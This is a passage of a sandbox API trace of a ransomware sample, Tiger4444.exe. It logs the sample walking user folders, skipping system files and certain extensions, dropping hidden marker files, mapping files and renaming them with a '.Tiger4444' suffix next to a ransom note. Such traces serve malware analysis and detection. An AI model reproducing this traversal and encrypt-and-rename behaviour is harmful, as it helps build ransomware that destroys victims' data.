ftLastAccessTime.dwLowDateTime=0x87537bb1, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x875d04f9, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0057.630] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.630] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0057.630] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53f4df4, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x146557ae, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x146557ae, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sys", cAlternateFileName="")) returned 1 [0057.630] lstrcmpiW (lpString1="sys", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0057.630] lstrcmpiW (lpString1="sys", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.630] lstrcmpiW (lpString1="sys", lpString2="Tiger4444.exe") returned -1 [0057.630] lstrcmpiW (lpString1="sys", lpString2=".") returned 1 [0057.630] lstrcmpiW (lpString1="sys", lpString2="..") returned 1 [0057.630] lstrcmpiW (lpString1="sys", lpString2="windows") returned -1 [0057.630] lstrcmpiW (lpString1="sys", lpString2="bootmgr") returned 1 [0057.630] lstrcmpiW (lpString1="sys", lpString2="pagefile.sys") returned 1 [0057.630] lstrcmpiW (lpString1="sys", lpString2="boot") returned 1 [0057.630] lstrcmpiW (lpString1="sys", lpString2="ids.txt") returned 1 [0057.630] lstrcmpiW (lpString1="sys", lpString2="NTUSER.DAT") returned 1 [0057.630] lstrcpyW (in: lpString1=0x30aeb5e, lpString2="sys" | out: lpString1="sys") returned="sys" [0057.630] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc66600 [0057.630] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xbe) returned 0xc73f50 [0057.630] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc66608 | out: ListHead=0xc66828, ListEntry=0xc66608) returned 0xc66308 [0057.630] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53f4df4, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x146557ae, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x146557ae, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sys", cAlternateFileName="")) returned 0 [0057.630] FindClose (in: hFindFile=0xc72e08 | out: hFindFile=0xc72e08) returned 1 [0057.630] lstrcpyW (in: lpString1=0x30aeb5e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0057.630] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0057.632] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0057.634] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0057.634] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0057.634] CloseHandle (hObject=0x2b8) returned 1 [0057.634] CloseHandle (hObject=0x2c4) returned 1 [0057.634] GetCurrentThreadId () returned 0xfa8 [0057.634] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc66608 [0057.635] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0057.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc73f50 | out: hHeap=0xc50000) returned 1 [0057.635] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc66600 | out: hHeap=0xc50000) returned 1 [0057.635] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys" [0057.635] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\" [0057.635] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\.BFC0E91B00AE8A0620D3" [0057.635] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0057.637] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0057.639] FlushFileBuffers (hFile=0x2c4) returned 1 [0057.640] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0057.640] CloseHandle (hObject=0x2c4) returned 1 [0057.641] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 94 [0057.641] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.641] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53f4df4, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x1a57fc00, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x875f662d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc72e08 [0057.641] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.641] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.641] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0057.641] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0057.641] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe53f4df4, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x1a57fc00, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x875f662d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.641] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.641] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.641] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0057.641] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0057.641] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0057.641] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe695a8e5, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c43548, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0xe6c43548, ftLastWriteTime.dwHighDateTime=0x1d32736, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="#aa.online-metrix.net", cAlternateFileName="#AAONL~1.NET")) returned 1 [0057.641] lstrcmpiW (lpString1="#aa.online-metrix.net", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.641] lstrcmpiW (lpString1="#aa.online-metrix.net", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.641] lstrcmpiW (lpString1="#aa.online-metrix.net", lpString2="Tiger4444.exe") returned -1 [0057.641] lstrcmpiW (lpString1="#aa.online-metrix.net", lpString2=".") returned -1 [0057.641] lstrcmpiW (lpString1="#aa.online-metrix.net", lpString2="..") returned -1 [0057.641] lstrcmpiW (lpString1="#aa.online-metrix.net", lpString2="windows") returned -1 [0057.641] lstrcmpiW (lpString1="#aa.online-metrix.net", lpString2="bootmgr") returned -1 [0057.641] lstrcmpiW (lpString1="#aa.online-metrix.net", lpString2="pagefile.sys") returned -1 [0057.641] lstrcmpiW (lpString1="#aa.online-metrix.net", lpString2="boot") returned -1 [0057.641] lstrcmpiW (lpString1="#aa.online-metrix.net", lpString2="ids.txt") returned -1 [0057.641] lstrcmpiW (lpString1="#aa.online-metrix.net", lpString2="NTUSER.DAT") returned -1 [0057.641] lstrcpyW (in: lpString1=0x30aeb66, lpString2="#aa.online-metrix.net" | out: lpString1="#aa.online-metrix.net") returned="#aa.online-metrix.net" [0057.641] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0x13) returned 0xc664e0 [0057.641] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x0, Size=0xea) returned 0xc8ebc0 [0057.641] RtlInterlockedPushEntrySList (in: ListHead=0xc66828, ListEntry=0xc664e8 | out: ListHead=0xc66828, ListEntry=0xc664e8) returned 0xc66308 [0057.642] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x875f662d, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x875f662d, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x875f662d, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0057.642] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.642] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0057.642] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe53f753e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x1a57fc00, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x1a57fc00, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x212, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.sol", cAlternateFileName="")) returned 1 [0057.642] lstrcmpiW (lpString1="settings.sol", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0057.642] lstrcmpiW (lpString1="settings.sol", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.642] lstrcmpiW (lpString1="settings.sol", lpString2="Tiger4444.exe") returned -1 [0057.642] lstrcmpiW (lpString1="settings.sol", lpString2=".") returned 1 [0057.642] lstrcmpiW (lpString1="settings.sol", lpString2="..") returned 1 [0057.642] lstrcmpiW (lpString1="settings.sol", lpString2="windows") returned -1 [0057.642] lstrcmpiW (lpString1="settings.sol", lpString2="bootmgr") returned 1 [0057.642] lstrcmpiW (lpString1="settings.sol", lpString2="pagefile.sys") returned 1 [0057.642] lstrcmpiW (lpString1="settings.sol", lpString2="boot") returned 1 [0057.642] lstrcmpiW (lpString1="settings.sol", lpString2="ids.txt") returned 1 [0057.642] lstrcmpiW (lpString1="settings.sol", lpString2="NTUSER.DAT") returned 1 [0057.642] lstrcpyW (in: lpString1=0x30aeb66, lpString2="settings.sol" | out: lpString1="settings.sol") returned="settings.sol" [0057.642] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol", dwFileAttributes=0x0) returned 1 [0057.643] lstrlenW (lpString="settings.sol") returned 12 [0057.643] lstrlenW (lpString="Tiger4444") returned 9 [0057.643] lstrcmpiW (lpString1="tings.sol", lpString2="Tiger4444") returned 1 [0057.643] lstrlenW (lpString=".dll") returned 4 [0057.643] lstrcmpiW (lpString1=".sol", lpString2=".dll") returned 1 [0057.643] lstrlenW (lpString=".lnk") returned 4 [0057.643] lstrcmpiW (lpString1=".sol", lpString2=".lnk") returned 1 [0057.643] lstrlenW (lpString=".ini") returned 4 [0057.643] lstrcmpiW (lpString1=".sol", lpString2=".ini") returned 1 [0057.643] lstrlenW (lpString=".sys") returned 4 [0057.643] lstrcmpiW (lpString1=".sol", lpString2=".sys") returned -1 [0057.643] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2b8 [0057.643] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0057.643] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=14909619505) returned 1 [0057.643] GetFileSizeEx (in: hFile=0x2b8, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=530) returned 1 [0057.643] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89b30 [0057.643] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc721d0 [0057.643] CreateFileMappingW (hFile=0x2b8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x520, lpName=0x0) returned 0x2cc [0057.646] MapViewOfFile (hFileMappingObject=0x2cc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x520) returned 0xbe0000 [0057.647] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0057.647] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0057.647] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0057.647] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75db0 [0057.647] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc7d140 [0057.647] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75db0 | out: hHeap=0xc50000) returned 1 [0057.647] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc7d140 | out: hHeap=0xc50000) returned 1 [0057.647] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0057.647] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=14910048628) returned 1 [0057.647] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89b30 | out: hHeap=0xc50000) returned 1 [0057.647] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc721d0 | out: hHeap=0xc50000) returned 1 [0057.647] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0057.648] CloseHandle (hObject=0x2cc) returned 1 [0057.648] CloseHandle (hObject=0x2b8) returned 1 [0057.648] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.Tiger4444") returned 117 [0057.648] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.Tiger4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol.tiger4444"), dwFlags=0x1) returned 1 [0057.649] FindNextFileW (in: hFindFile=0xc72e08, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe53f753e, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x1a57fc00, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0x1a57fc00, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x212, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="settings.sol", cAlternateFileName="")) returned 0 [0057.649] FindClose (in: hFindFile=0xc72e08 | out: hFindFile=0xc72e08) returned 1 [0057.649] lstrcpyW (in: lpString1=0x30aeb66, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0057.650] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c4 [0057.651] CreateFileMappingW (hFile=0x2c4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x2b8 [0057.651] MapViewOfFile (hFileMappingObject=0x2b8, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xbe0000 [0057.651] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0057.651] CloseHandle (hObject=0x2b8) returned 1 [0057.651] CloseHandle (hObject=0x2c4) returned 1 [0057.651] GetCurrentThreadId () returned 0xfa8 [0057.651] RtlInterlockedPopEntrySList (in: ListHead=0xc66828 | out: ListHead=0xc66828) returned 0xc664e8 [0057.651] lstrcpynW (in: lpString1=0x30aeaa8, lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net" [0057.651] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc8ebc0 | out: hHeap=0xc50000) returned 1 [0057.651] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc664e0 | out: hHeap=0xc50000) returned 1 [0057.651] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net" [0057.651] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\" [0057.651] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\.BFC0E91B00AE8A0620D3" [0057.652] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x2c4 [0057.653] WriteFile (in: hFile=0x2c4, lpBuffer=0xc708ac*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x30aca68, lpOverlapped=0x0 | out: lpBuffer=0xc708ac*, lpNumberOfBytesWritten=0x30aca68*=0x3d4, lpOverlapped=0x0) returned 1 [0057.655] FlushFileBuffers (hFile=0x2c4) returned 1 [0057.656] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0057.656] CloseHandle (hObject=0x2c4) returned 1 [0057.656] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net") returned 116 [0057.657] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.657] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\#aa.online-metrix.net\\*", lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe695a8e5, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c43548, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x8761c7de, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xc73048 [0057.657] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.657] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.657] lstrcmpiW (lpString1=".", lpString2="Tiger4444.exe") returned -1 [0057.657] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0057.657] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe695a8e5, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xe6c43548, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x8761c7de, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.657] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.657] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0057.657] lstrcmpiW (lpString1="..", lpString2="Tiger4444.exe") returned -1 [0057.657] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0057.657] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0057.657] FindNextFileW (in: hFindFile=0xc73048, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x8761c7de, ftCreationTime.dwHighDateTime=0x1d50d44, ftLastAccessTime.dwLowDateTime=0x8761c7de, ftLastAccessTime.dwHighDateTime=0x1d50d44, ftLastWriteTime.dwLowDateTime=0x8761c7de, ftLastWriteTime.dwHighDateTime=0x1d50d44, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0057.657] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.657] 